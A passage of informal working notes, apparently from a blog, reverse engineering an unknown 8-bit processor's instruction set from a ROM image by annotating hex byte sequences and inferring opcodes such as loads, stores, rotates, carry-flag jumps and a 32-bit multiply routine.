c8e9b0 ; [0xb0e9]<-0
72 73
e9d8ee ; r1<-[0xeed8]
e8d7ee ; r0<-[0xeed7]
bff5ec ; ?
ecd5ee ; r4<-[0xeed5]
bc63ea
; so this loop is...
; do { X r1, X r3, X r2, X r1, X r0, X r4 } while cond(r4) ?
69 3b 3a 39 38 44
99f8
ecd3ee 5474 e8d4ee 097114
c999b4
c898b4
e8daee
c877b4
e8d9ee
c876b4
18..1f seem like r0 |= rX:
e835ef e932ef 19 e933ef 19 e934ef 19
9019
where 19 would mean this ORs all four bytes and checks for.. zero? non-zero?
--[ inc and dec are a loop's best friend
and maybe 4X is dec? shr? 40 agrees, here's a branch table or smth?
9814
11 19
9810
40 98b6
40 98ba
40 98d8
40 98db
40 98df
40
bf57d0 bfbfcf
seems like 40 is dec r0, consider this loop:
e103
e87fb4
21 ; op r1
74 ; op r4
e500 ; r5<-0x00
e00b ; r0<-0x0b
loop:
69 34 35 40 ; op r1?; op? r4; op? r5; dec r1
90 fa ; jnz loop
so 0100_0XXX seems like dec rN. 0011_0XXX may be inc rN? and what is 0x69.
some more about the low 7Xs:
86
14 76 e8e2ed ; r4->r0? ; ...??? r6; r0<-[0xede2] ..
; maybe 76 is xchg r0, r6?
7e 9817 ; 7e is maybe "compare r0 and r6"; jz?
e003 c858ef e0ff c859ef ce5aefe458e5efbfded6cee2ed
8e b9
since other ops seem oriented around operations on r0 and modifying r0, the
low 7x's might be moving from r0 to a different register? in contrast to low
1x which move into r0. for example in the partially-disassembled snippet,
r1 <- 0x04
r0 <- r2
r0 |= r1
op7x.lo r0, r2
r0 <- 0x32
[0xf029] <- r0
it's loaded r0, modified it, and would clobber it after the unknown op.
op7x.lo must at least read r0 and write r2 or other state. there aren't
any other instructions to read flags or anything before the next op7x.lo,
r1 <- 0x10
r0 <- r2
r0 |= r1
op7x.lo r0, r2
so it could be an add/sub to store back into r2, but the or wouldn't make
sense. if the r0 is the only register that can be modified by arithmetic
instructions - instructions seem small so there's not much encoding space
- then modifying a value would look like "copy to r0, modify, copy back".
meanwhile 78..7f is probably a cmp (rather than sub): in a sequence like
r1 <- 0x03
r0 <- [0xb475]
op7xhi r0, r1 ; byte 0x79
jcc.lo.0 $+0x10 ; bytes 9010, destination `dest`
r1 <- 0x04
r0 <- [0xeed2]
op7xhi r0, r1
jcc.hi.0 $+0x08
r0 <- 0x03
[0xeed2] <- r0
op.bc ec2c
dest:
r1 <- 0x03
so if op7xhi r0, r1 modified the destination, that modification is clobbered.
it generates flags (consumed by jcc.lo.0). 79 is a very common prefix to 90xx
or 98xx branches, but uncommon to stand alone.
counterpoint though, sequences like
e100 ; r1 <- 0x00
bfecac ; unknown
c9dfee c8deee ; [0xeedf] <- r1; [0xeede] <- r0
e8eded 902f ; r0 <- [0xeded]; jcc $+0x2f?
have a useful branching condition with only loads (barring bfecac generating
a status). and even if bfecac did generate a status, the next code if this
is taken would be
e8e8ed 9841 ; r0 <- [0xede8]; jcc $+0x41
so either the e8 load is enough to generate a status or the 98 branch is
fully determined from the earlier bfecac. it's possible; the branches could
be a pair like jnz and ja, where there is a third reasonable condition (jb)
that becomes the implicit third outcome. but in that case why e8e8ed before
the branch?
so perhaps the 90/98 conditions are predicated fully on the contents of r0?
ah, still unsure about bf, but this seems useful:
86
14 76 e8e2ed
7e 9817
e003 c858ef ; [0xef58] <- 0
e0ff
c859ef ce5aef ; [0xef59] <- 0; [0xef5a] <- 0xff
e458 ; r4 <- 0x58
e5ef ; r5 <- 0xef ; so r5 and r4 together hold `ef58`,
; just assigned
bfded6 ; consumes r4, r5, writes r6?
cee2ed ; [0xed2e] <- r6
8e b9
--[ more subtle loads or stores?
distracted by fe01. found this:
87 86 ; push r7; push r6
28 c83df3 ; xor r0, r0; [0xf33d] <- r0
e00a c83cf3 ; r0 <- 0x0a; [0xf33c] <- r0
28 c8c2ee ; xor r0, r0; [0xeec2] <- r0
e6ca e7ee ; r6<-ca; r7<-ee ; r7:r6 = 0xeeca
fe02 c837f3 ; fe02 ; [0xf337] <- r0
fe01 c836f3 ; fe01 ; [0xf336] <- r0
fe03 c838f3 ; fe03 ; [0xf338] <- r0
fe04 c839f3 ; fe04 ; [0xf339] <- r0
fe05 c83af3 ; fe05 ; [0xf33a] <- r0
fe06 c83bf3 ; fe06 ; [0xf33b] <- r0
f6 9827 ;
so fe0X writes to r0. before feXX are issued, r6 and r7 are often loaded
with values that are also similar to nearby pointer values. so r7:r6
usually forms a valid pointer. fe00 does not exist in the image. is there
a shorter instruction for a load of [r7:r6 + 0]?
separately, looks like deXX is store r0 to [r7:r6 + XX]. consider this code:
87 86 ; push r7; push r6
ca40ef cc41ef ; [0xef40] <- r2; [0xef41] <- r4
e412 bf14e9 76 11 77 ; r4 <- 0x12; call? ; r0->r6; r1->r0; r0->r7
e072 ; r0 <- 0x72
de03 ; hmm
e841ef de04 ; r0 <- [0xef41]; hmm
e840ef de05 ; r0 <- [0xef40]; hmm
e83eee de06 ; r0 <- [0xee3e]; hmm
e200 16 74 17 75 bf5f05 ; e2 <- 00; r6->r0; r0->r4; r7->r0; r0->r5; call?
8e 8f b9 ; pop r6; pop r7; ret
so if the move of r1:r0 to r7:r6 is for a reason, that likely means:
* the calling convention has pointers returned in r1:r0
* deXX might use r7:r6?
then between each deXX the program only loads r0 with an e8XXXX, so deXX
does not modify r0. if it modifies other registers, it's not r2 (clobbered
later), not r4, r5 (clobbered later). if it's an indirect store through
r7:r6 it doesn't seem to increment (if it does, this is a .... very strange
access pattern).
most likely seems to be r0 -> [r7:r6 + imm8]. that seems like a plausible
function:
push r7; push r6;
[0xef40] <- r2; [0xef41] <- r4;
r4 <- 0x12; call 0xe914;
r1:r0 -> r7:r6 ; grouped a few moves together for
; this overall effect
r0 <- 0x72; [r7:r6 + 3] <- r0
r0 <- [0xef41]; [r7:r6 + 4] <- r0
r0 <- [0xef40]; [r7:r6 + 5] <- r0
r0 <- [0xee3e]; [r7:r6 + 6] <- r0
r2 <- 0x00; r7:r6 -> r5:r4; call 0x055f ; eliding more movs
pop r6; pop r7;
ret
and 18..1f is or! here's another region:
e400 bf4204 ; r4 <- 0x00; call
76 11 77 ; r1:r0 -> r7:r6 ; similar to before:
; exact movs are r0->r6; r1->r0; r0->r7
71 16 ; r0 -> r1; r6 -> r0
19 ; unknown
9003 ; jcc $+3
bf420b ; call
e0ff de03 ; r0 <- 0xff; [r7:r6 + 3] <- r0
28 de04 ; xor r0, r0; [r7:r6 + 4] <- r0
e005 de05 ; r0 <- 0x05; [r7:r6 + 5] <- r0
28 de06 ; xor r0, r0; [r7:r6 + 6] <- r0
bf4204 returned a pointer that would be used in de03 and later, below.
before it is used there though, 71 16 19 does something with the two bytes
of pointer before conditionally calling(?) something(?). there aren't many
useful operations on the two bytes.
it's probably or, meaning 71 16 19 forms a null check, and there are likely
other hits for that sequence... there are seven. four have the condition
branch over a bf420b, so maybe 0xb42 is a fault handler? reset? some kind
of trap. it probably doesn't return here since i'm certain that r7:r6 is
not useful for writing anyway.
also, that tells us 90 is jnz. 98 then is probably jz. that's consistent
with sequences from earlier, like
11 19 9810 ; r0 <- r1; r0 |= r1 ; jz $+10
40 98b6 ; dec r0 ; jz $-0x4a
40 98ba ; dec r0 ; jz $-0x46
40 98d8 ; dec r0 ; jz $-0x28
40 98db ; dec r0 ; jz $-0x25
40 98df ; dec r0 ; jz $-0x21
implementing a branch table for i in 0..5?
--[ a multiplier!
69 and 38..3f make more sense from this loop:
28 c8e8b0 c8e9b0 ; xor r0, r0; [0xb0e8] <- r0; [0xb0e9] <- r0;
72 73 ; r0 -> r2; r0 -> r3
e9d8ee e8d7ee ; r1:r0 <- [0xeed7:0xeed8]
bff5ec ; call
ecd5ee ; r4 <- [0xee5d]
bc63ea ; dunno
69 3b 3a 39 38 44 ; ??? but r3, r2, r1, r0, then dec r4
99f8 ; conditional branch to ???
so for each of 3b..38 it operates on rN, maybe r0. but if it accumulates
into r0, why loop r4 times? if 3b mutates only r3, then there are few
operations that make sense for all four registers:
* not adc/sbc (add/sub X to each byte?)
* could be ror/rol (operates on each byte independently)
* rcr could be it, high bytes carry into lower
* rcl could be it if endianness were such that the value is r0:r1:r2:r3
* since it only rotates by one bit it may actually be called a shift
through carry?
if it's rcr/rcl then 69 clears the carry flag between loops so the loop
implements a shift rather than rotate.
assuming 38..3f is rcr since r3:r2:r1:r0 matches endianness seen elsewhere.
seems like fa is similar to fe, but loading through r3:r2 instead of r7:r6.
fe07 72 fe08 73 ; [r7:r6 + 7..8] -> r3:r2
fa03 c872ed ; fa03; store [0xed72]
fa02 c871ed ; fa02; store [0xed71]
fe07 72 fe08 73 e004 d2 bceacc
fe07 72 fe08 73 ; [r7:r6 + 7..8] -> r3:r2
e873ed da02 ; load [0xed73]; da02
fe07 72 fe08 73 ; [r7:r6 + 7..8] -> r3:r2
e875ed da04 ; load [0xed75]; da04
e874ed da03 ; load [0xed74]; da03
fa might clobber r3:r2? again if it was "load and increment" or "store and
increment" then the immediate offsets are very odd. maybe the repeated loads
of r3:r2 are redundant?
also from this, da looks similar to de: store r0 to [r3:r2 + XX].
21 might be and r0, r1? r1 seem to often have some immediate consecutive
bitmasky thing loaded shortly before 21. same for 22. check this out:
f2 74
e001 e100 e200 e300 ; r3:r2:r1:r0 <- 0
9804 ; ???
50 31 32 33 ; op ?r0?; op r1, op r2, op r3 - maybe
; ` r0; rcl r1; rcl r2; rcl r3
44 ; dec r4
99f9 ; conditional loop
ec2eef 24 80 ; load r4; op r4; push r0
e82fef 21 71 ; load r0; op r2; r0->r1
e830ef 22 72 ; load r0; op r2; r0->r2
e831ef 23 73 ; load r0; op r3; r0->r3
88 ; pop r0
c832ef c933ef ca34ef cb35ef ; store r3:r0 -> [0xef32:0xef35]
looks like the loop is building up a 32b bitmask, anding, then storing back?
ok, different function:
e408 ; r4 <- 8
back:
69 3d ; ccf; rcr r5
911d ; jcc.lo.1 forward
back:
e8eab0 56 c8eab0 ; r0 <- [0xb0ea]; op5x r0, r6; [0xb0ea] <- r0
e8ebb0 09 c8ebb0 ; r0 <- [0xb0eb]; op0x r0, r1; [0xb0eb] <- r0
e8ecb0 0a c8ecb0 ; r0 <- [0xb0ec]; op0x r0, r2; [0xb0ec] <- r0
e8edb0 0b c8edb0 ; r0 <- [0xb0ed]; op0x r0, r3; [0xb0ed] <- r0
69 ; ccf
forward:
36 31 32 33 44 ; something on r6, r1, r2, r3; dec r4
90d8 ; jnz back
b9 ; ret
first observation: 91 is probably jnc. if it's jc then the loop would be
entered with a carry flag set ... only on the first iteration. it seems
more likely this is relying on knowing cf is unset to not execute ccf
needlessly at the jump target. compared with other codegen, maybe this
is a hand-written intrinsic?
second observation: 30..37 might be rcl? whatever 56 .. 09 .. 0a .. 0b does,
the surrounding load/stores suggest that there's a 32b value in r3:r2:r1:r6.
meanwhile, the loop operates on r6:r1:r2:r3. each op would then carry out to
the next most significant byte, and this is similar to rcr already known to
be 38..3f.
then if 30..37 is rcl, the loop implements <u32> << 8. why is TBD, but it
seems like a plausible high-level behavior.
elsewhere, this helps explain 50:
f6 74 ; ; r0 -> r4
e001 e100 e200 e300 ; r3:r2:r1:r0 <- 00_00_00_01
9804 ; jcc $+4
50 31 32 33 ; ; rcl r1; rcl r2; rcl r3
44 ; dec r4
99f9 ; jcc $-7
c83bef c93cef ca3def cb3eef ; [0xef3b:0xef3e] <- r3:r2:r1:r0
if 50 were add r0, r0, this implements 1u32 << r4 - add r0, r0 is
functionally the same as shifting r0 left by 1 with highest bit carried
out. it seems unlikely to be adc, because in other places 50 is used it
seems that cf is indeterminate.
this region also reinforces that 99 is jnc. if 99 were jc the loop would be
taken at most once, but as jnc it is taken until r4 == 0.
this in turn helps explain 08..0f:
e408 ; r4 <- 8
bit:
69 3d 911d ; ccf; rcr r5; jc clear
e8eab0 56 c8eab0 ; add [0xb0ea], r6
; (taking creative liberties with the isa)
e8ebb0 09 c8ebb0 ; op [0xb0eb], r1
e8ecb0 0a c8ecb0 ; op [0xb0ec], r2
e8edb0 0b c8edb0 ; op [0xb0ed], r3
clear:
69 36 31 32 33 44 ; ccf; rcl r6:r1:r2:r3; dec r4
90d8 ; jnz bit
b9 ; ret
so... this would be a 32b by 8b multiply.. but only if op is adc. for each
set bit in r5, add r6:r1:r2:r3 into 0xb0ea. shift r6:r1:r2:r3 left 1
regardless of bit being set in r5. repeat 8 times for each bit in r5.
... that said, the calling convention for this is different from every other
function, and is moderately unhinged: why is r4 unused? why is r0 unused?
why is r6 used??? either way. 08..0f is adc.
but this function is weird enough to try figuring that out sooner than later.
looking for the memory address referenced here, 0xb0ea there's this region
i'd looked at very early on that seems relevant:
c870ef c971ef
e878b4 e979b4 ec70ef 59 4c 74 11 e971ef 49 71 14 c977b4
c876b4 28 c8beb9 e0ea c8c0b9 e00d c8bfb9 e201 e405 bcc632 e105 e875b4
79 9004
28 c8d2ee
b98485 86 e600 ; something; push r6; r6 <- 0
ceeab0 ; [0xb0ea] <- 0
ceebb0 ; [0xb0eb] <- 0
ceecb0 ; [0xb0ec] <- 0
ceedb0 ; [0xb0ed] <- 0
76 ede6b0 ; r0 -> r6 ; r5 <- [0xb0e6]
bf 2f ; op; op
ed ed e7b0bf 2f ; ??
ed ed e8b0bf 2f ; ??
ed ed e9b0bf 2f ; ??
ed ; ??
e8eab0 ; [0xb0ea:0xbeed] <- r3:r2:r1:r0
e9ebb0
eaecb0
ebedb0
8e 8d 8c b9
but the whole thing in the middle is nonsense. taking a much closer look,
though, this was before i'd learned... many things about the instruction set.
first, on line 6 the first instruction is not b98485! it is just b9 - ret.
so this region is actually the end of one function and start of the next.
84 85 86 are pushes in the prologue of the real function of interest.
additionally, bf is not a standalone instruction, it takes two bytes as an
immediate to call. and ed is not an instruction on its own, it is
r5 <- [imm16]. so lets delineate that correctly...
84 85 86 e600 ; push r4; push r5; push r6; r6 <- 0
ceeab0 ; [0xb0ea] <- 0
ceebb0 ; [0xb0eb] <- 0
ceecb0 ; [0xb0ec] <- 0
ceedb0 ; [0xb0ed] <- 0
76 ; r0 -> r6
ede6b0 bf2fed ; r5 <- [0xb0e6]; call 32x8b multiply?
ede7b0 bf2fed ; r5 <- [0xb0e7]; call 32x8b multiply?
ede8b0 bf2fed ; r5 <- [0xb0e8]; call 32x8b multiply?
ede9b0 bf2fed ; r5 <- [0xb0e9]; call 32x8b multiply?
e8eab0 ; [0xb0ea:0xbeed] <- r3:r2:r1:r0
e9ebb0
eaecb0
ebedb0
8e 8d 8c b9
and so here we are: this function implements a 32b x 32 multiply of the
integers in b0ea:b0ed and b0e6:b0e9, storing the result in b0ea:b0ed.
notable mention to r0, which happens to be the low byte of the last round
of multiplication, so the e8eab0: [0xb0ea] <- r0 is in fact correctly
storing the low byte of this whole thing to the output region.
notable mention, too, to 76: r0 -> r6, because by leaving r0 free for
clobber the inner multiply routine does not need to move the r0 argument
elsewhere to free r0 for use in add/adc. and loads from memory are no more
expensive (in terms of code size) when loading to an alternate register,
so it's simple enough to load directly to r6 for the to-multiply byte of
reach step.
--[ what's left?
OK. this is great progress so far. many instructions make sense, composition
of those instructions seems reasonable. the only remaining encoding regions
that are unknown are:
* 00..07
* 48..4f
* 58..5f
* 60..6f, except 69 (ccf)
* 78..7f: might be cmp, might be sub. need evidence one way or the other!
* a0..af, seems not-present
* b0..b7, seems not-present, except b4
* b8..bf, except b9, bc (maybe jump?), bf
* c0..c7, which is remarkably rare
* d0..df, except da, de. seen but not understood: db, dc
* f0..ff, except fa, fe. seen but not understood: f0, f2, f3, f4, f6
and as a bonus, knowing the relationship of the last two functions i'd
looked at, i know the base address of this rom (finally!!): the inner
multiply routine starts at 0xedf2, so the first byte of this image is
at address 0xed2f (mapped) - 0x31c3 (file) == 0xbb5c.
here's a theory for d2, d4, d6, as well as e2, e4, e6: like their d<high>
counterparts but with no immediate offset. that is, d4 is [r5:r4] <- r0?
here's a hex region to help inform this theory:
900d ; jcc later
ea15ee eb16ee ; r4<-[0xee15]; r5<-[0xee16]
fa01 dc01 ; r0<-[r3:r2+1]; [r5:r4+1]<-r0
f2 d4 ; ?? ??
b9 ; ret
later:
ea15ee eb16ee ; r4<-[0xee15]; r5<-[0xee16]
fa03 dc01 ; r0<-[r3:r2+3]; [r5:r4+1]<-r0
fa02 d4 ; r0<-[r3:r2+2]; ??
b9 ; ret
so, this seems like a conditional branch to move 16b from one part of a
struct or another, to a single destination location. d4 probably stores
the lower byte being copied, evidenced by fa02 to load it in the later
branch. then f2 is probably a load of the lower byte, to store it in the
earlier case. there is no dc00 or fa00 or similar.... probably because
for offset-by-zero cases, there are these shorter instructions for the
same outcome. this happens to make for a neat pattern as well for opcodes
like 0b11x1_iNNN:
* x picks between "load" and "store" - this is the difference between
0xde and 0xfe
* i picks between offset 0 and offset imm8 - this is the difference
between 0xd4 and 0xdc
* NNN picks which register pair to indirect through - d2 uses r3:r2,
d4 uses r5:r4, d6 uses r7:r6
and so this opens more questions than it answers! what happens if NNN an
odd register? can this machine indirect through a register pair like r4:r3?
why is the pair r1:r0 never used? what about r7:r6? in fact rEven:rOdd seems
never used, are those instructions entirely different?
... [ week long pause here. Destiny 2: The Final Shape launched, and
everything else ground to a halt ] ...
--[ whittling down the last few opcodes...
OK. short list of remaining instructions. motivation and optimism are
starting to fade.. but i want to figure out as many as possible.
[: 48..4f :]
it seems like 48..4f has some kind of a lead here:
e878b4 e979b4 ec70ef 59 4c 74 11 e971ef 49 71 14 c977b4
which at first only looks interesting for its use of the very uncommon opcode
4c. structuring that slightly differently makes some of the relationships a
little more clear:
e878b4 e979b4 ; r0:r1 <- [0xb478:0xb479]
ec70ef 59 4c 74 11 ; r4 <- [0xef70]; ???; ???; r0 -> r4; r1 -> r0
e971ef 49 71 14 ; r1 <- [0xef71]; ???; r0 -> r1; r4 -> r0
c977b4 c876b4 ; [0xb477:0xb478] <- r0:r1
the 4c and 49 operations clearly modify r0. 59 might modify a register or
do something else; if it modifies a register, it's probably r1 which is used
later. it seems like r1 is the high byte of a 16b integer, so an operation
directly on that byte seems a little unlikely. 59 might be a mirror of 69
(clear carry flag), setting the carry flag instead?
as for 49 and 4c, best guesses are heavily informed by what i already know:
this isn't adc, or, and, add, rotate left or right, ... but given the seeming
16b value being operated on, maybe these are sbc. that would mean with 59
being set cf, this is computing something like *0xb479 -= *0xef70 + 1.
this isn't a lot to go on for sbc, but double-checking a different function,
it's at least coherent:
e8e8ed 9841
e103 fe01 79 9807
e102 fe01 79
9022
ea03ee eb04ee
e058 e11b
59 4a 72 ; ??? ; sbc r0, r2; r0 -> r2
11 4b 73 ; r1 -> r0 ; sbc r0, r3; r0 -> r3
e8deee 7a e8dfee 4b 9108 ; r0 <- [0xeede]; r0 -= r2; r0 <- [0xeedf]
; sbc r0, r3; jc $+8
bf27c5 e400 bff4dd
e102 fe01 79 9803
bc05c7
28 c8e8ed bc05c7
e101 fe01
79 9008
i've marked up the most relevant lines: 59 is a leader again, and r1 is
used here, but if 59 modifies r1 then, again, it's something that makes
sense to do first and only to the upper byte of a 16bit number. r2:r3
seem subtracted into, and with the load; sub; load; sbc; jc sequence
this implements something like if (r2:r3 - 0x1b58 >= [0xeede:0xeedf])
[: 59 ... or a wild guess towards 58..5f? :]
going to also assume that 59 is set carry flag, since no other 58..5f
instructions seem to be present here.. this mirrors 69 as well.
[: 60..67 ... where possible :]
61 shows up before conditional branches, usually after loading from 0xf303..?
is that maybe a gpio address? 60 and 62 are also present .... here:
fe07 72 fe08 73 fa04 c875ed fa03 c874ed e850f1 62 9003 bceacc e852f1
60 9003 bceacc e400 bf67c5 bceacc
... is 60..67 something like "extract bit N of r0"? r0 is typically loaded
before it's executed, and conditional branches are always present after.
probably not consuming an rN and probably modifies r0 for the condition.
difficult to imagine another purpose for a 3-bit field at that point.
[: ba :]
another region i looked at very early on has a "ba" in it at least. it's a
remarkably rare opcode, it seems:
8f 8e 88
c8f0b0 88 c8efb0 88 c8eeb0 88 c8edb0 88
c8ecb0 88 c8ebb0 88 c8eab0 88 c8e9b0 88
c8e8b0 88 c8e7b0 88 c8e6b0
8d 8c 8b 8a 89 88
bae8f3 b4 c85ced e8f2b4 c85bed
b9
... is actually split up wrong, rather than bae8f3 b4, this is ba e8f3b4!
matching with the e8f2b4 to load one byte lower a few instructions later.
fixed up that looks like this:
[elided restore of 0xb0e6:0xb0f0]
8d 8c 8b 8a 89 88
ba
e8f3b4 c85ced e8f2b4 c85bed
b9
so then this routine is restoring the region of bytes used for 32b x 32b
multiply, all registers, then almost-but-not-ret. given the full-restore
including scratch memory, this seems like the end of an interrupt routine.
so ba is iret? consistent with what might be an ISR return at least. there
happens to be another small routine directly after.
[: 00..07 :]
turning all the way back, this pattern gives an idea for 00..07:
e850ef e951ef ; r1:r0 <- [0xef51]:[0xef50]
e404 ; r4 <- 0x04
54 ; r0 += r4
9101 ; jnc $+1
01 ; ???
80 ; push r0
f0 ; r0 <- [r1:r0]
74 ; r4 <- r0
88 ; pop r0
f801 ; r0 <- [r1:r0 + 1]
75 ; r5 <- r0
or this,
15 71 14 ; r1:r0 <- r5:r4
e304 ; r3 <- 0x04
53 ; r0 += r3
9101 ; jnc $+1
01 ; ???
76 11 77 ; r7:r6 <- r1:r0
so here, 01 is only conditionally executed if adding produced a carry out.
r0 and r1 seem to be operated on together, so the two might be logically a
16-bit integer. so 01 might be inc rN? in that case the carry out is being
conditionally added into the higher byte. nothing else has seemed obviously
like an inc yet. this seems a little odd on the whole in the first snippet,
since the result of addition doesn't seem to be preserved.. r0 is clobbered
in the last load. could that whole region have been f805 74 f806 75? this
might still be missing some additional behavior.
other uses of 00..07 don't obviously disagree with this though.
for example, 00:
e8eeed 00 c8eeed ; [0xedee] += 1
...
fa03 00 da03 ; [r3:r2 + 3] += 1
...
fe04 00 de04 ; [r7:r6 + 4] += 1
...
e8c0ee 00 c8c0ee ; [0xeec0] += 1
so, maybe 00 actually is inc.
--[ mostly done, what's left in the encoding space?
this all is some progress, with not much left unknown. from the earlier list:
* 00..07 - inc rN
* 48..4f - sbc r0, rN
* 58..5f, except 59 (scf) - might be flags manipulation? not present,
either way
* 60..68 - bit r0, N * 68..6f, except 69 (ccf) - might be flags
manipulation? not present, either way
* 78..7f: might be cmp, might be sub. need evidence one way or the other!
* a0..af, seems not-present - a0 is present.. once.
* b0..b7, seems not-present
* b8..bf, except b9, ba, bc (maybe jump?), bf
* c0..c7, which is remarkably rare. c0, c4, c6?
* d0..df, ~except da, de. seen but not understood: db, dc~ d0..d7, evens,
are [rN+1:rN] <- r0 d8..df, evens, are [rN+1:rN + imm] <- r0 db is not
actually present, was a misreading of the program
* f0..ff, ~except fa, fe. seen but not understood: f0, f2, f3, f4, f6~
f0..f7, evens, are r0 <- [rN+1:rN] f8..ff, evens, are
r0 <- [rN+1:rN + imm] f3 is not actually present, was a misreading of
the program
so.. last questions:
* is 78..7f actually sub or cmp?
* what is a0?
* what are c0..c7?
--[ 78..7f ... sub or cmp?
the question really is, "does this instruction modify r0?" - it's possible
that the instruction computes sub, stores the result, and the program never
actually uses that result, either because subtraction isn't often used or
because of a compiler deficiency, something else, whatever. so the best
guess here is, "is r0 ever preserved after a 78..7f?" or asked differently,
"does r0 get preserved/restored around a 78..7f?"
the only hint that 78..7f might clobber r0 comes from regions like this:
e103 fe01 79 9807 ; r1 <- 3; r0 <- [r7:r6]; sub r0, r1; jz ...
e102 fe01 79 9022 ; r1 <- 2; r0 <- [r7:r6]; sub r0, r1; jnz ...
ea03ee eb04ee e058 e11b ...
if 79 were cmp and did not modify r0, there wouldn't be a need to reload
it in fe01. ... but this may be poor code, and the reload may actually be
redundant. since this seems to implement
if ([r7:r6] == 3 || [r7:r6] == 2) { .. load registers }
and there are no other signs that 78..7f clobbers r0, this might actually
be cmp.
--[ what is a0?
this seems to be the only place a0 is present:
14 71
bcabe6
bfd00e ; call 0xed0 (???)
c8bcee ; [0xeebc] <- r0
a0 ; ???
72 11 73 ; r3:r2 <- r1:r0
fa0b c8bfee ; [0xeebf] <- [r3:r2 + 0x0b]
fa0a c8beee ; [0xeebe] <- [r3:r2 + 0x0a]
e046 40 ; r0 <- 0x46; dec r0 (???)
da0a ; [r3:r2 + 0x0a] <- r0
e0e6 9901 ; r0 <- 0xe6; jc $+01
40 ; dec r0 (???)
da0b ; [r3:r2 + 0x0b] <- r0
b9
whatever it is, it presumably operates on at least r0, writes to r0 and r1.
the routine at 0xed0 (outside the image?) may say more about what the
registers are at its return, but from this alone it's hard to guess. it
is interesting and remarkable that only r0 is saved to [0xeebc], not r1!
--[ what are c0..c7?
these instructions are pretty infrequent. of the few places they show up, this
seems like the most informative region to dig into:
e81ff8 61 903c
ea29ef eb2aef ; r5:r4 <- [0xef2a]:[0xef29]
fa08 71 fa07 ; r1:r0 <- [r5:r4 + 8]:[r5:r4 + 7]
c0 ; ??
74 11 75 ; r5:r4 <- r1:r0
12 ; r0 <- r2
e92aef ; r1 <- [0xef2a]
e307 53 9101 ; r3 <- 0x07; add r0, r3; jnc $+1
01 ; inc r1
80 f0 72 88 ; r2 <- [r1:r0]
f801 73 ; r3 <- [r1:r0 + 1]
f2 ; r0 <- [r3:r2]
e1ff 51 ; r0 += 0xff
77 ; r7 <- r0
e600 ; r6 <- 0
9806 ;
f4 c88cf8 ; [0xf88c] <- [r5:r4]
c4 ; ??
06 ; inc r6
16 7f ; r0 <- r6; cmp r0, r7
91f6 ; jb $-0x0a
the ending loop makes some sense: load from a 16-bit pointer, store to
maybe-IO-register(?), increment r6, repeat until r6 == r7. in other contexts
where c0 is used, r1:r0 is recently populated with a 16-bit integer too. so
it seems likely that c[0-7] operates on at least rN, maybe rN+1 if it's more
like the d_ or f_ two-registers-as-an-address instructions.
if c4 were a load or store it would probably operate with respect to r0 and
r4, but r0 is immediately clobbered, so it's probably not a load or otherwise
leaving a result in r0. if it were a store this might overwrite a buffer..
somewhere.. with 0, 1, 2, 3, 4, .. <r7>.
looking at the c0 earlier in this block r1:r0 is loaded immediately before,
and then read (copied to r5:r4) immediately after. r5:r4 is used for the f4
load, so those registers form something like a pointer.
compare with the other use of c4 in this program here:
e4e3 e5ed ; r4 <- 0xe3; r5 <- 0xed
e28f e301 ; r2 <- 0x8f; r3 <- 0x01
28 ; xor r0, r0
loop:
42 9903 ; dec r2; jnc body
43 9105 ; dec r3; jc exit
body:
d4 ; [r5:r4] <- r0
c4 ; ???
bc69bb ; jmp loop
exit:
bc26be ; jmp ... somewhere ...
r5:r4 is written through, but the combined `dec r2; jnc body; dec r3;
jc exit; ... jmp loop` forms a a loop that repeats until r3:r2 is
decremented past zero. the loop body is simply `[r5:r4] <- r0, r0` set to
zero, c4 probably operates on r5:r4, and if it modifies r0 then r0 is left
in that modified state for the next store through [r5:r4].
looking at other 8-bit processors for inspiration regarding c[0246], it
seems plausible that it is in fact an increment for a register pair. in
that case, the loop forms a memset, clearing 0x1c0 bytes of memory. this
is also almost at the start of the image - not knowing where execution
begins, it still seems likely enough that this is related to initialization.
there might not be a corresponding 16-bit decrement instruction? or if there
is, like the 8080, it might not set flags; if so, it would not be useful to
decrement r3:r2 in this loop because an explicit test for zero would still be
necessary.
looking back at the other loop earlier:
e600 ; r6 <- 0
9806 ;
f4 c88cf8 ; [0xf88c] <- [r5:r4]
c4 ; inc r5:r4
06 ; inc r6
16 7f ; r0 <- r6; cmp r0, r7
91f6 ; jc $-0x0a
then taking c4 to be inc r5:r4 makes this a loop writing the bytes from a
buffer r7 bytes long at r5:r4 into the address f88c. why not decrement r7
instead of the inc/mov/compare??
--[ but wait! what happened with jcc?
in writing this up, i flip-flopped on the meaning of 91 and 99 jumps without
entirely realizing it. two different regions of code suggest different
semantics!
first, the inner multiply loop from earlier:
e408 ; r4 <- 8
back:
69 3d ; ccf; rcr r5
911d ; jcc.lo.1 forward
back:
e8eab0 56 c8eab0 ; add [0xb0ea], r6
e8ebb0 09 c8ebb0 ; add [0xb0eb], r1
e8ecb0 0a c8ecb0 ; add [0xb0eb], r2
e8edb0 0b c8edb0 ; add [0xb0eb], r3
69 ; ccf
forward:
36 31 32 33 44 ; ccf; rcl r6:r1:r2:r3; dec r4
90d8 ; jnz back
b9 ; ret
where 91 seems like jnc - "jump past adding in the multiplier if the next
bit in the multiplicand was 0". but a different loop suggests the opposite
reading:
e4e3 e5ed ; r4 <- 0xe3; r5 <- 0xed
e28f e301 ; r2 <- 0x8f; r3 <- 0x01
28 ; xor r0, r0
loop:
42 9903 ; dec r2; jnc body
43 9105 ; dec r3; jc exit
body:
d4 ; [r5:r4] <- r0
c4 ; ???
bc69bb ; jmp loop
exit:
bc26be ; jmp ... somewhere ...
where instead it's 99 that looks like a jnc - "if decrementing r2 did not
borrow, do not decrement r3 and continue another loop iteration". and 91
is what looks like a jc- "if decrementing r3 borrowed, skip past the loop
body".
either "jc" and "jnc" are conditional on more than it first seems, or
perhaps more likely, dec produces a carry bit any time the result is
not zero. as an example:
| r0 | r0-after-dec | carry |
|------|--------------|-------|
| 0x00 | ff + 0 = ff | 0 |
| 0x01 | ff + 1 = 00 | 1 |
| 0x02 | ff + 2 = 01 | 1 |
| 0xff | ff + ff = fe | 1 |
that would bring this all back together: 99 is jc, 91 is jnc. it's rare that
there's a dec; jcc (one other instance in this program at 0x16db), so it's
hard to cross-check this interpretation.
--[ last thoughts
in looking at this i was very surprised by how informative loops - especially
short loops - are for finding bounds of what a program may or likely does not
do. this isn't very surprising in retrospect; short programs don't have
opportunities to do very much, and doing the same not-very-much in a loop
has even fewer opportunities to do something useful.
loops are usually conditioned on a relatively simple predicate:
while x < 10 do { ... }
// or
do { ... } while x > 10
// or
while x != 0 { x = loop_body() }
a lot of behavior fell out of finding short loops and making sense of the
